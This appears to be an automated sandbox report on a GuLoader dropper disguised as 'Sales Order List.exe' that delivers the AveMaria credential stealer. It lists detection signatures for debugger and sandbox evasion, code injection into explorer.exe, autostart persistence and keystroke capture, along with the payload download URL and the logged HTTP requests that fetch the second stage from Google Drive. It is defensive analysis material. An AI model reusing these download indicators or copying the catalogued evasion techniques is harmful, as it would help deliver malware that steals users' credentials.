Windows Analysis Report Sales Order List.exe

Overview

General Information

Sample Name: Sales Order List.exe
Analysis ID: 526595
MD5: 80bad0903ee7ec98805678673720cfd9
SHA1: 35aecf6fe3ac24adaf16c04b787e90ac4c845eb0
SHA256: 260e6b75d7616efd29c05151f1ce95bbab1aaf8703f86f62c4d9bc6d308a56b8
Infos:

Most interesting Screenshot:

Detection

GuLoader AveMaria
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloads;R"}
Multi AV Scanner detection for submitted file
Source: Sales Order List.exe ReversingLabs: Detection: 40%
Yara detected AveMaria stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\images.exe ReversingLabs: Detection: 40%
Antivirus or Machine Learning detection for unpacked file
Source: 4.3.Sales Order List.exe.18f3e10.7.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 4.3.Sales Order List.exe.18f3e10.3.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

barindex
Uses 32bit PE files
Source: Sales Order List.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: C:\Users\user\Desktop\Sales Order List.exe Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000014.00000003.125904782894.0000000005CEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.125904003059.0000000002DFC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb6H&8e source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb( source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033173702.0000000005431000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb$H48s source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.125903738538.0000000002D80000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033269253.0000000005520000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb( source: WerFault.exe, 00000014.00000003.125909078051.0000000005CE0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000014.00000003.125905831080.0000000005C34000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb( source: WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.125900100057.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
Source: Binary string: TextShaping.pdb source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdbQ source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: CoreMessaging.pdb( source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb( source: WerFault.exe, 00000014.00000003.125905988617.0000000005C45000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb( source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.125907125589.0000000005C3A000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb( source: WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb8H 8 source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
Source: Binary string: ,wntdll.pdb source: WerFault.exe, 00000014.00000003.125899412774.0000000002D70000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022159017.0000000006493000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
Source: Binary string: TextShaping.pdb( source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023187158.00000000068BD000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb( source: WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
Source: Binary string: msctf.pdb( source: WerFault.exe, 00000014.00000003.125910562779.0000000005D02000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.125903704223.0000000002D7B000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.125903667098.0000000002D75000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb} source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: TextInputFramework.pdb( source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.125907817675.0000000002E17000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000014.00000003.125904042199.0000000002E01000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=downloads;R
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.184.220.29 93.184.220.29
Source: Joe Sandbox View IP Address: 93.184.220.29 93.184.220.29
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000000B.00000002.130410544642.000000000CFBC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000B.00000002.130410016644.000000000CF7B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000B.00000000.125786547597.000000000A940000.00000002.00020000.sdmp String found in binary or memory: http://schemas.micro
Source: Sales Order List.exe String found in binary or memory: http://topqualityfreeware.com
Source: Amcache.hve.LOG1.20.dr String found in binary or memory: http://upx.sf.net
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: http://www.foreca.com
Source: Sales Order List.exe String found in binary or memory: http://www.topqualityfreeware.com/
Source: explorer.exe, 0000000B.00000002.130415876105.0000000010478000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
Source: explorer.exe, 0000000B.00000000.125824449017.0000000002E75000.00000004.00000001.sdmp String found in binary or memory: https://aka.ms/odirme
Source: explorer.exe, 0000000B.00000002.130409357270.000000000CEEE000.00000004.00000001.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000B.00000000.125824045068.0000000002E1A000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000B.00000002.130406454585.000000000CBA2000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000B.00000000.125782425758.00000000093FE000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?P
Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivations
Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Sales Order List.exe String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
Source: Sales Order List.exe, 00000004.00000003.125871810697.0000000001879000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/7
Source: Sales Order List.exe, 00000004.00000003.125871877283.0000000001883000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/S~
Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5i
Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/w
Source: Sales Order List.exe, 00000004.00000003.125871692204.0000000001870000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/
Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/4
Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn
Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnY
Source: Sales Order List.exe, 00000004.00000003.125743205436.00000000018AE000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnawmvg8FJU4CwcICFY
Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnc
Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.comn
Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmp String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp String found in binary or memory: https://outlook.comows.CB
Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmp String found in binary or memory: https://powerpoint.office.com8
Source: WerFault.exe, 00000014.00000003.125950197304.0000000002D61000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemet
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000B.00000002.130416256186.00000000104AE000.00000004.00000001.sdmp String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000000B.00000002.130414430727.0000000010370000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehpA
Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpU
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknown DNS traffic detected: queries for: drive.google.com
